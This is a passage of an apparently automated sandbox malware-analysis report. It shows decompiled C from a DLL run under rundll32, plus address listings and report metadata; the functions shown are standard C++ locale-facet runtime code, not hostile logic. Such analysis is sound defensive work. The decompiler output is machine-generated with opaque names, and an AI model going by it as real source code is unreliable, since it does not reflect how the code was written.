																						E6E206653(_t594 - 0x14, 0);
																						_t573 =  *0x6e2c6db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6E1E161C(0x6e2c6d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6E2066BA(_t594 - 0x14);
																							return E6E220075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6E2113A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t594 - 0x20);
																									E6E223D74(_t594 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t420, _t559, _t573, 0x14);
																									E6E206653(_t594 - 0x14, 0);
																									_t574 =  *0x6e2c6ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6E1E161C(0x6e2c6d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6E2066BA(_t594 - 0x14);
																										return E6E220075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6E211409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t594 - 0x20);
																												E6E223D74(_t594 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t420, _t560, _t574, 0x14);
																												E6E206653(_t594 - 0x14, 0);
																												_t575 =  *0x6e2c6de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6E1E161C(0x6e2c6d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6E2066BA(_t594 - 0x14);
																													return E6E220075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6E211471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t594 - 0x20);
																															E6E223D74(_t594 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t420, _t561, _t575, 0x14);
																															E6E206653(_t594 - 0x14, 0);
																															_t576 =  *0x6e2c6dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6E1E161C(0x6e2c6da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6E2066BA(_t594 - 0x14);
																																return E6E220075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6E2114EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t594 - 0x20);
																																		E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t420, _t562, _t576, 0x14);
																																		E6E206653(_t594 - 0x14, 0);
																																		_t577 =  *0x6e2c6dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6E1E161C(0x6e2c6d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6E2066BA(_t594 - 0x14);
																																			return E6E220075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6E211558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t594 - 0x20);
																																					E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t420, _t563, _t577, 0x14);
																																					E6E206653(_t594 - 0x14, 0);
																																					_t578 =  *0x6e2c6e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6E1E161C(0x6e2c6dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6E2066BA(_t594 - 0x14);
																																						return E6E220075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6E2115C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t594 - 0x20);
																																								E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t420, _t564, _t578, 0x14);
																																								E6E206653(_t594 - 0x14, 0);
																																								_t579 =  *0x6e2c6dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6E1E161C(0x6e2c6d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6E2066BA(_t594 - 0x14);
																																									return E6E220075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6E21162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6E1E1438(_t511);
																																											E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e26851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6e26c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6E21542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6E220075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6E206FD3(__eflags, _t565);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6e2c6dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6E206FD3(__eflags, _t564);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6e2c6e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6E206FD3(__eflags, _t563);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6e2c6dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6E206FD3(__eflags, _t562);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6e2c6dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6E206FD3(__eflags, _t561);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6e2c6de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6E206FD3(__eflags, _t560);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6e2c6ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6E206FD3(__eflags, _t559);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6e2c6db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6E206FD3(__eflags, _t558);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6e2c6dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6E206FD3(__eflags, _t557);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6e2c6dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6E206FD3(__eflags, _t556);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6e2c6dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6E206FD3(__eflags, _t555);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6e2c6df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6E206FD3(__eflags, _t554);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6e2c6df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6E206FD3(__eflags, _t553);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6e2c6dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}













































                          0x6e20f4c1
                          0x6e20f4c1
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f2
                          0x6e20f4f7
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F4C8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F4D2
                          • int.LIBCPMT ref: 6E20F4E9
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F523
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F543
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F561
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: tm,n
                          • API String ID: 651022567-372086613
                          • Opcode ID: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
                          • Instruction ID: 3d7b4184a9cf290e8d376da37961dc493cf19a053d9752398efd262e1cf1dcd8
                          • Opcode Fuzzy Hash: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
                          • Instruction Fuzzy Hash: 9411C67991091E9BCF01DBE4CC94AEEB77BBF44B18F240908E5106B2D0EFB4AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t682 - 0x14, 0);
				_t651 =  *0x6e2c6dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6E1E161C(0x6e2c6d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6E2066BA(_t682 - 0x14);
					return E6E220075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6E210FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t682 - 0x20);
							E6E223D74(_t682 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t635, _t651, 0x14);
							E6E206653(_t682 - 0x14, 0);
							_t652 =  *0x6e2c6df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6E1E161C(0x6e2c6d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6E2066BA(_t682 - 0x14);
								return E6E220075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6E211057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t682 - 0x20);
										E6E223D74(_t682 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t482, _t636, _t652, 0x14);
										E6E206653(_t682 - 0x14, 0);
										_t653 =  *0x6e2c6dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6E1E161C(0x6e2c6d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6E2066BA(_t682 - 0x14);
											return E6E220075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6E2110BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
